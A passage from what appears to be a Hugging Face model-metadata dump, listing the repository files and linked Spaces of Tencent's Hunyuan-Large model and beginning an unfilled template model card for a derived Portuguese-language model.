lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/hy.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/modeling_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00001-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00002-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00003-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00004-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00005-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00006-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00007-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00008-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00009-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00010-of-00080.bin', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00011-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00012-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00013-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00014-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00015-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00016-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00017-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00018-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00019-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00020-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00021-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00022-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00023-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00024-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00025-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00026-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00027-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00028-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00029-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00030-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00031-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00032-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00033-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00034-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00035-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00036-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00037-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00038-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00039-of-00080.bin', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00040-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00041-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00042-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00043-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00044-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00045-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00046-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00047-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00048-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00049-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00050-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00051-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00052-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00053-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00054-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00055-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00056-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00057-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00058-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00059-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00060-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00061-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00062-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00063-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00064-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00065-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00066-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00067-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00068-of-00080.bin', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00069-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00070-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00071-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00072-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00073-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00074-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00075-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00076-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00077-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00078-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00079-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model-00080-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/test.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/test4consistent.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/tokenization_hy.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/__init__.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/configuration_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/hy.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/modeling_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00001-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00002-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00003-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00004-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00005-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00006-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00007-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00008-of-00080.bin', size=None, blob_id=None, 
lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00009-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00010-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00011-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00012-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00013-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00014-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00015-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00016-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00017-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00018-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00019-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00020-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00021-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00022-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00023-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00024-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00025-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00026-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00027-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00028-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00029-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00030-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00031-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00032-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00033-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00034-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00035-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00036-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00037-of-00080.bin', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00038-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00039-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00040-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00041-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00042-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00043-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00044-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00045-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00046-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00047-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00048-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00049-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00050-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00051-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00052-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00053-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00054-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00055-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00056-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00057-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00058-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00059-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00060-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00061-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00062-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00063-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00064-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00065-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00066-of-00080.bin', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00067-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00068-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00069-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00070-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00071-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00072-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00073-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00074-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00075-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00076-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00077-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00078-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00079-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00080-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/test.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/test4consistent.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/tokenization_hy.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Notice', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""kali99066/tencent-Tencent-Hunyuan-Large"", ""QuiteBitter/tencent-Tencent-Hunyuan-Large"", ""kangyuliu/tencent-Tencent-Hunyuan-Large"", ""w1166en/tencent-Tencent-Hunyuan-Large"", ""eberhenriquez94/tencent-Tencent-Hunyuan-Large"", ""ernie565/tencent-Tencent-Hunyuan-Large"", ""Dmtlant/tencent-Tencent-Hunyuan-Large"", ""RomanRG008/tencent-Tencent-Hunyuan-Large"", ""elsh2001/tencent-Tencent-Hunyuan-Large"", ""RomanRG008/tencent-Tencent-Hunyuan-Large-new"", ""Thetutorcyber/tencent-Tencent-Hunyuan-Large"", ""zhzabcd/tencent-Tencent-Hunyuan-Large"", ""salehelatawy/tencent-Tencent-Hunyuan-Large"", ""hunt616/tencent-Tencent-Hunyuan-Large"", ""seowizardagency/tencent-Tencent-Hunyuan-Large"", ""MohamedMostafa1986/tencent-Tencent-Hunyuan-Large"", ""awayers/tencent-Tencent-Hunyuan-Large"", ""fomafoma/UltimatePrompt"", ""Konst2021/tencent-Tencent-Hunyuan-Large"", ""Sethskyler/tencent"", ""gk1d/tencent-Tencent-Hunyuan-Large"", ""yordyi/tencent-Tencent-Hunyuan-Large"", ""khenjy/tencent-Tencent-Hunyuan-Large"", 
""windhw/tencent-Tencent-Hunyuan-Large"", ""gdnjr5233-YOLOer/Tencent-Hunyua-Large-Streamlit-Demo"", ""JohnJohnnyJohn/tencent-Tencent-Hunyuan-Large"", ""S2pidhere/tencent-Tencent-Hunyuan-Large"", ""MarlonMorales/tencent-Tencent-Hunyuan-Large"", ""devanshsingh2199/customllm""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-19 05:30:33+00:00"", ""cardData"": ""language:\n- en\nlibrary_name: transformers\nlicense: other\nlicense_name: tencent-license\nlicense_link: https://huggingface.co/tencent/Tencent-Hunyuan-Large/blob/main/LICENSE.txt\npipeline_tag: text-generation"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""6717b638c54ec650f7ab021d"", ""modelId"": ""tencent/Tencent-Hunyuan-Large"", ""usedStorage"": 3895680282804}",0,"https://huggingface.co/MuriloSOliveira1/MuriloSOliveira, https://huggingface.co/musasa121/gta, https://huggingface.co/ArthurXyz/ThurAssist, https://huggingface.co/roseb7d/HFOpenAI",4,https://huggingface.co/BATSCIENCE/BATSOUNDS,1,,0,,0,"Dmtlant/tencent-Tencent-Hunyuan-Large, QuiteBitter/tencent-Tencent-Hunyuan-Large, RomanRG008/tencent-Tencent-Hunyuan-Large, RomanRG008/tencent-Tencent-Hunyuan-Large-new, Thetutorcyber/tencent-Tencent-Hunyuan-Large, eberhenriquez94/tencent-Tencent-Hunyuan-Large, elsh2001/tencent-Tencent-Hunyuan-Large, ernie565/tencent-Tencent-Hunyuan-Large, huggingface/InferenceSupport/discussions/new?title=tencent/Tencent-Hunyuan-Large&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Btencent%2FTencent-Hunyuan-Large%5D(%2Ftencent%2FTencent-Hunyuan-Large)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, kali99066/tencent-Tencent-Hunyuan-Large, kangyuliu/tencent-Tencent-Hunyuan-Large, tencent/Hunyuan-Large, w1166en/tencent-Tencent-Hunyuan-Large, zhzabcd/tencent-Tencent-Hunyuan-Large",14
|
| 166 |
+
MuriloSOliveira1/MuriloSOliveira,"---
|
| 167 |
+
license: llama3.2
|
| 168 |
+
language:
|
| 169 |
+
- pt
|
| 170 |
+
base_model:
|
| 171 |
+
- tencent/Tencent-Hunyuan-Large
|
| 172 |
+
---
|
| 173 |
+
# Model Card for Model ID
|
| 174 |
+
|
| 175 |
+
<!-- Provide a quick summary of what the model is/does. -->
|
| 176 |
+
|
| 177 |
+
This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1).
|
| 178 |
+
|
| 179 |
+
## Model Details
|
| 180 |
+
|
| 181 |
+
### Model Description
|
| 182 |
+
|
| 183 |
+
<!-- Provide a longer summary of what this model is. -->
|
| 184 |
+
|
| 185 |
+
|
| 186 |
+
|
| 187 |
+
- **Developed by:** [More Information Needed]
|
| 188 |
+
- **Funded by [optional]:** [More Information Needed]
|
| 189 |
+
- **Shared by [optional]:** [More Information Needed]
|
| 190 |
+
- **Model type:** [More Information Needed]
|
| 191 |
+
- **Language(s) (NLP):** [More Information Needed]
|
| 192 |
+
- **License:** [More Information Needed]
|
| 193 |
+
- **Finetuned from model [optional]:** [More Information Needed]
|
| 194 |
+
|
| 195 |
+
### Model Sources [optional]
|
| 196 |
+
|
| 197 |
+
<!-- Provide the basic links for the model. -->
|
| 198 |
+
|
| 199 |
+
- **Repository:** [More Information Needed]
|
| 200 |
+
- **Paper [optional]:** [More Information Needed]
|
| 201 |
+
- **Demo [optional]:** [More Information Needed]
|
| 202 |
+
|
| 203 |
+
## Uses
|
| 204 |
+
|
| 205 |
+
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
|
| 206 |
+
|
| 207 |
+
### Direct Use
|
| 208 |
+
|
| 209 |
+
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
|
| 210 |
+
|
| 211 |
+
[More Information Needed]
|
| 212 |
+
|
| 213 |
+
### Downstream Use [optional]
|
| 214 |
+
|
| 215 |
+
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
|
| 216 |
+
|
| 217 |
+
[More Information Needed]
|
| 218 |
+
|
| 219 |
+
### Out-of-Scope Use
|
| 220 |
+
|
| 221 |
+
